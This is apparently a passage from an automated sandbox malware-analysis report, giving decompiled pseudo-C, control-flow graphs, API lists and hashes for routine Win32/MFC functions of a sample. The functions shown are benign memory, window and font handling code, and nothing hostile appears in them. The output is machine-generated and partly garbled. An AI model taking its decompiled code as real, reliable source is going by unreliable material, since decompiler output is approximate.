                  • Opcode Fuzzy Hash: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction Fuzzy Hash: 6E417571A003199BDB21EF65DD45B9BB7FCAF08305F90097BE445D2252EB78DA84CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004206EA, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 353 4206ea-42070b EnterCriticalSection 354 42071a-42071f 353->354 355 42070d-420714 353->355 357 420721-420724 354->357 358 42073c-420744 354->358 355->354 356 4207d8-4207db 355->356 360 4207e3-420801 LeaveCriticalSection 356->360 361 4207dd-4207e0 356->361 359 420727-42072a 357->359 362 420746-420759 call 4148c1 GlobalAlloc 358->362 363 42075b-42077f GlobalHandle GlobalUnlock call 4148c1 GlobalReAlloc 358->363 364 420734-420736 359->364 365 42072c-420732 359->365 361->360 370 420785-420787 362->370 363->370 364->356 364->358 365->359 365->364 371 420789-42078e 370->371 372 4207ac-4207d5 GlobalLock call 431160 370->372 374 420790-420798 GlobalHandle GlobalLock 371->374 375 42079e-4207a7 LeaveCriticalSection call 4063fe 371->375 372->356 374->375 375->372
                  C-Code - Quality: 90%
                  			E004206EA(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x466584
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0x7e0110
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E004148C1(_t59, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E004148C1(_t59, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0x7e0110
							_t72 =  *_t16;
							_t85 = _t72;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E004063FE(_t57, _t61, _t68, _t72, _t85);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x0
						_v12 = _t40;
						E00431160(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0x7e0110
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0x7e0110
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x0
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x1
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0x7e0110
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}






















                  0x004206ea
                  0x004206ef
                  0x004206f0
                  0x004206f3
                  0x004206f5
                  0x004206f5
                  0x004206fa
                  0x004206fd
                  0x00420703
                  0x00420703
                  0x00420706
                  0x00420706
                  0x0042070b
                  0x0042071a
                  0x0042071c
                  0x0042071f
                  0x0042073c
                  0x0042073c
                  0x0042073c
                  0x0042073f
                  0x00420742
                  0x00420744
                  0x0042075c
                  0x00420763
                  0x00420766
                  0x00420774
                  0x0042077a
                  0x0042077f
                  0x00420746
                  0x00420749
                  0x0042074f
                  0x00420753
                  0x00420753
                  0x00420787
                  0x00420789
                  0x00420789
                  0x0042078c
                  0x0042078e
                  0x00420798
                  0x00420798
                  0x004207a1
                  0x004207a7
                  0x004207a7
                  0x004207ad
                  0x004207b3
                  0x004207be
                  0x004207c7
                  0x004207d2
                  0x004207d5
                  0x00420721
                  0x00420721
                  0x00420724
                  0x00420727
                  0x0042072c
                  0x0042072d
                  0x00420732
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420732
                  0x00420736
                  0x00000000
                  0x00000000
                  0x00420736
                  0x0042070d
                  0x0042070d
                  0x00420714
                  0x00000000
                  0x00000000
                  0x00420714
                  0x004207d8
                  0x004207db
                  0x004207dd
                  0x004207e0
                  0x004207e0
                  0x004207e3
                  0x004207ec
                  0x004207ef
                  0x004207f2
                  0x004207f5
                  0x00420801

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004206FD
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420753
                  • GlobalHandle.KERNEL32 ref: 0042075C
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420766
                  • GlobalReAlloc.KERNEL32(00406452,00000000,00002002), ref: 0042077F
                  • GlobalHandle.KERNEL32 ref: 00420791
                  • GlobalLock.KERNEL32 ref: 00420798
                  • LeaveCriticalSection.KERNEL32(00411FA3,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004207A1
                  • GlobalLock.KERNEL32 ref: 004207AD
                  • _memset.LIBCMT ref: 004207C7
                  • LeaveCriticalSection.KERNEL32(00411FA3,0041F372,00406452,00411FA3), ref: 004207F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  • Opcode ID: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction ID: df76cc218ce0eed47cdce916ccd5606461eaefea175fd580b96fa8a2acb9575c
                  • Opcode Fuzzy Hash: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction Fuzzy Hash: FA31DC75600714AFD7209F6AEC89A5ABBF9FF84304B00492EE942D3661DB74F8408F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410B6D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 96%
                  			E00410B6D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				long _t39;
				void* _t40;
				void* _t43;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				CHAR* _t69;
				void* _t72;

				_t65 = __edx;
				_t61 = __ecx;
				_push(0x40);
				E00431ACE(E0044B0B7, __ebx, __edi, __esi);
				_t67 =  *(_t72 + 8);
				_t69 = "AfxOldWndProc423";
				_t31 = GetPropA(_t67, _t69);
				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				 *(_t72 - 0x18) = _t31;
				_t59 = 1;
				_t33 =  *(_t72 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E0040EE3C(1, _t61,  *(_t72 + 0x14));
					E00410A7D(_t61, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t59 = 0 | E00410AF5(1, _t67, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
							RemovePropA(_t67, _t69);
							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								_t39 = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14)); // executed
								 *(_t72 - 0x14) = _t39;
							} else {
								E0040D7C1(E0040EE3C(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
								E0040F5B7(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
							}
						}
					}
				}
				return E00431B73( *(_t72 - 0x14));
			}














                  0x00410b6d
                  0x00410b6d
                  0x00410b6d
                  0x00410b74
                  0x00410b79
                  0x00410b7c
                  0x00410b83
                  0x00410b89
                  0x00410b8d
                  0x00410b91
                  0x00410b99
                  0x00410b9a
                  0x00410b9d
                  0x00410c49
                  0x00410c5b
                  0x00000000
                  0x00410ba3
                  0x00410ba3
                  0x00410ba6
                  0x00410c41
                  0x00410c60
                  0x00410c62
                  0x00000000
                  0x00000000
                  0x00410ba8
                  0x00410ba8
                  0x00410bab
                  0x00410c04
                  0x00410c0c
                  0x00410c1d
                  0x00000000
                  0x00410bad
                  0x00410bb2
                  0x00410c64
                  0x00410c71
                  0x00410c77
                  0x00410bb8
                  0x00410bc9
                  0x00410be6
                  0x00410bee
                  0x00410bee
                  0x00410bb2
                  0x00410bab
                  0x00410ba6
                  0x00410bfb

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction ID: 7d730690561c9216d8e88f9ae386013ec32041a0da163b1d26ff2b3a16a30a38
                  • Opcode Fuzzy Hash: f8daf118ba78ef8a89b28ddf675110c5a81804194b7a1092223d3a2c73349c4a
                  • Instruction Fuzzy Hash: 2B316D32800219BBCF11AFE6DD4DDFF7A78BF09305F00052AF501B2161DB7999A09BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004064F0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 407 4064f0-4064ff 408 406505-406546 GetDC GetSystemMetrics CreateFontA 407->408 409 406588-406589 407->409 410 406551-406565 GetCharWidthA 408->410 411 406548-40654e SelectObject 408->411 412 406576-406587 ReleaseDC 410->412 413 406567-406570 SelectObject DeleteObject 410->413 411->410 412->409 413->412
                  C-Code - Quality: 100%
                  			E004064F0(void* __ecx) {
				struct HDC__* _v8;
				void* _v12;
				int _t9;
				int _t15;
				void* _t20;

				_t9 =  *0x462634; // 0xf
				if(_t9 == 0xffffffff) {
					_v8 = GetDC(0);
					_v12 = 0;
					_t20 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t20 != 0) {
						_v12 = SelectObject(_v8, _t20);
					}
					GetCharWidthA(_v8, 0x36, 0x36, 0x462634); // executed
					if(_t20 != 0) {
						SelectObject(_v8, _v12);
						DeleteObject(_t20);
					}
					ReleaseDC(0, _v8);
					_t15 =  *0x462634; // 0xf
					return _t15;
				}
				return _t9;
			}








                  0x004064f7
                  0x004064ff
                  0x00406529
                  0x0040652c
                  0x00406542
                  0x00406546
                  0x0040654e
                  0x0040654e
                  0x0040655d
                  0x00406565
                  0x0040656d
                  0x00406570
                  0x00406570
                  0x0040657a
                  0x00406580
                  0x00000000
                  0x00406587
                  0x00406589

                  APIs
                  • GetDC.USER32(00000000), ref: 0040650B
                  • GetSystemMetrics.USER32 ref: 0040652F
                  • CreateFontA.GDI32(00000000), ref: 00406536
                  • SelectObject.GDI32(?,00000000), ref: 0040654C
                  • GetCharWidthA.GDI32(?,00000036,00000036,00462634), ref: 0040655D
                  • SelectObject.GDI32(?,?), ref: 0040656D
                  • DeleteObject.GDI32(00000000), ref: 00406570
                  • ReleaseDC.USER32 ref: 0040657A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction ID: e81e0d02648677b469a39f7f1f5c13e3aea240fbea2e15458392ef8c70e3ee26
                  • Opcode Fuzzy Hash: d625e81e30d2d5b5eacfecf79bbbfade7bba1e7911b5c54bb0e160659e22b730
                  • Instruction Fuzzy Hash: 2C118E35942224BBD7215BA2ED4EDCFBE2DFF16BA0F510021F109A11A0C6B10E00CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042143D, Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 414 42143d-42145e DefWindowProcA 415 421546-421549 414->415 416 421464-42148f GetWindowRect 414->416 417 421491-42149b 416->417 418 4214ed-4214ef 416->418 417->418 419 42149d-4214ea SetRect InvalidateRect SetRect InvalidateRect 417->419 420 4214f1-4214fb 418->420 421 421545 418->421 419->418 420->421 422 4214fd-42153f SetRect InvalidateRect SetRect InvalidateRect 420->422 421->415 422->421
                  C-Code - Quality: 100%
                  			E0042143D(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69); // executed
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x466520, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x466520, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x466524, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x466524, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                  0x00421446
                  0x0042144d
                  0x00421454
                  0x0042145e
                  0x0042146c
                  0x00421472
                  0x00421478
                  0x0042147b
                  0x00421481
                  0x00421484
                  0x00421487
                  0x0042148a
                  0x0042148f
                  0x004214ac
                  0x004214bb
                  0x004214d2
                  0x004214e1
                  0x004214e7
                  0x004214ea
                  0x004214ea
                  0x004214ef
                  0x00421512
                  0x0042151d
                  0x00421534
                  0x0042153f
                  0x0042153f
                  0x00000000
                  0x00421545
                  0x00421549

                  APIs
                  • DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                  • GetWindowRect.USER32 ref: 0042146C
                  • SetRect.USER32 ref: 004214AC
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                  • SetRect.USER32 ref: 004214D2
                  • InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                  • SetRect.USER32 ref: 00421512
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                  • SetRect.USER32 ref: 00421534
                  • InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction ID: 67fc1e0d515d65dd7be6bb3fc1ba63dd0bc7bc45e6ac663643d9f47821cdaeb9
                  • Opcode Fuzzy Hash: 600d90e0c36db47e27be2003a9a329f79ea7bd473ed92dd9532af274cc9c2e19
                  • Instruction Fuzzy Hash: 25311A76A00119BFDB14CFA4DD89FAABB7CFB08300F110165FA05A7160D770AA54CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F201, Relevance: 12.1, APIs: 8, Instructions: 125windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 423 40f201-40f224 424 40f226-40f22d 423->424 425 40f22f-40f236 GetClientRect 423->425 426 40f23c-40f24a 424->426 425->426 427 40f259 426->427 428 40f24c-40f257 BeginDeferWindowPos 426->428 429 40f25d-40f268 GetTopWindow 427->429 428->429 430 40f2ab-40f2af 429->430 431 40f2b1-40f2b5 430->431 432 40f26a-40f27c GetDlgCtrlID call 40ee68 430->432 433 40f2e1-40f2e4 431->433 434 40f2b7-40f2ba 431->434 441 40f283-40f286 432->441 442 40f27e-40f281 432->442 438 40f2e6-40f2e9 433->438 439 40f338-40f33b 433->439 436 40f2cb-40f2df 434->436 437 40f2bc-40f2c9 CopyRect 434->437 443 40f346-40f34a 436->443 437->443 438->439 445 40f2eb-40f2f7 call 40ee3c 438->445 439->443 444 40f33d-40f340 KiUserCallbackDispatcher 439->444 446 40f2a2-40f2a5 GetWindow 441->446 447 40f288-40f28b 441->447 442->446 444->443 451 40f313-40f31a 445->451 452 40f2f9-40f310 445->452 446->430 447->446 449 40f28d-40f28f 447->449 449->446 453 40f291-40f29c SendMessageA 449->453 451->439 454 40f31c-40f333 call 40cee2 451->454 452->451 453->446 454->439
                  C-Code - Quality: 92%
                  			E0040F201(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				int _t62;
				signed int _t64;
				int _t72;
				intOrPtr* _t84;
				struct HWND__* _t90;

				_t72 = __ecx;
				_t74 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t90 = _t62;
					if(_t90 == 0) {
						break;
					}
					_t72 = GetDlgCtrlID(_t90);
					_t64 = E0040EE68(_t74, 0, _t90, __eflags, _t90);
					__eflags = _t72 - _a12;
					if(__eflags != 0) {
						__eflags = _t72 - _a4;
						if(__eflags >= 0) {
							__eflags = _t72 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t90, 0x361, 0,  &_v40); // executed
								}
							}
						}
					} else {
						_v8 = _t90;
					}
					_t62 = GetWindow(_t90, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E0040EE3C(_t72, _t74, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t84 = _a20;
								_v36.left = _v36.left +  *_t84;
								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E0040CEE2( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40); // executed
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}


















                  0x0040f210
                  0x0040f212
                  0x0040f216
                  0x0040f219
                  0x0040f21c
                  0x0040f21f
                  0x0040f224
                  0x0040f236
                  0x0040f226
                  0x0040f229
                  0x0040f22a
                  0x0040f22b
                  0x0040f22c
                  0x0040f22c
                  0x0040f23f
                  0x0040f244
                  0x0040f24a
                  0x0040f259
                  0x0040f259
                  0x0040f259
                  0x0040f24c
                  0x0040f254
                  0x0040f254
                  0x0040f260
                  0x0040f2ab
                  0x0040f2ab
                  0x0040f2af
                  0x00000000
                  0x00000000
                  0x0040f272
                  0x0040f274
                  0x0040f279
                  0x0040f27c
                  0x0040f283
                  0x0040f286
                  0x0040f288
                  0x0040f28b
                  0x0040f28d
                  0x0040f28f
                  0x0040f29c
                  0x0040f29c
                  0x0040f28f
                  0x0040f28b
                  0x0040f27e
                  0x0040f27e
                  0x0040f27e
                  0x0040f2a5
                  0x0040f2a5
                  0x0040f2b5
                  0x0040f2e1
                  0x0040f2e4
                  0x0040f2e6
                  0x0040f2e9
                  0x0040f2ee
                  0x0040f2f3
                  0x0040f2f7
                  0x0040f2f9
                  0x0040f2fe
                  0x0040f304
                  0x0040f30a
                  0x0040f310
                  0x0040f310
                  0x0040f310
                  0x0040f310
                  0x0040f313
                  0x0040f31a
                  0x0040f325
                  0x0040f333
                  0x0040f333
                  0x0040f31a
                  0x0040f2e9
                  0x0040f338
                  0x0040f33b
                  0x0040f340
                  0x0040f340
                  0x0040f2b7
                  0x0040f2ba
                  0x0040f2cb
                  0x0040f2d1
                  0x0040f2d7
                  0x0040f2da
                  0x0040f2dc
                  0x0040f2bc
                  0x0040f2c3
                  0x0040f2c3
                  0x0040f2ba
                  0x0040f34a

                  APIs
                  • GetClientRect.USER32 ref: 0040F236
                  • BeginDeferWindowPos.USER32 ref: 0040F24E
                  • GetTopWindow.USER32(00000001), ref: 0040F260
                  • GetDlgCtrlID.USER32 ref: 0040F26B
                  • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0040F29C
                  • GetWindow.USER32(00000000,00000002), ref: 0040F2A5
                  • CopyRect.USER32 ref: 0040F2C3
                  • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 0040F340
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
                  • String ID:
                  • API String ID: 1656430526-0
                  • Opcode ID: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction ID: 0940655b8c9f504fb26903620ff38c1a6262de45de23ed48141b808c52172a37
                  • Opcode Fuzzy Hash: 6d2dbe2eeacec313d78451a0fb5afa6627e160b037f6c151f147efc9526f9ac5
                  • Instruction Fuzzy Hash: 6A417B75900209EFCF20DF95C8849EEB7B5FF49314B1441BAE801B7290D7399A45CFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004203BF, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E004203BF(void* __ecx) {
				int _t5;
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t17 + 8)) = _t5;
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0x466510 = GetSystemMetrics(2) + 1;
				 *0x466514 = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}






                  0x004203cc
                  0x004203ce
                  0x004203d2
                  0x004203d9
                  0x004203e1
                  0x004203eb
                  0x004203fc
                  0x00420406
                  0x0042040e
                  0x0042041a

                  APIs
                  • KiUserCallbackDispatcher.NTDLL ref: 004203CE
                  • GetSystemMetrics.USER32 ref: 004203D5
                  • GetSystemMetrics.USER32 ref: 004203DC
                  • GetSystemMetrics.USER32 ref: 004203E6
                  • GetDC.USER32(00000000), ref: 004203F0
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00420401
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00420409
                  • ReleaseDC.USER32 ref: 00420411
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                  • String ID:
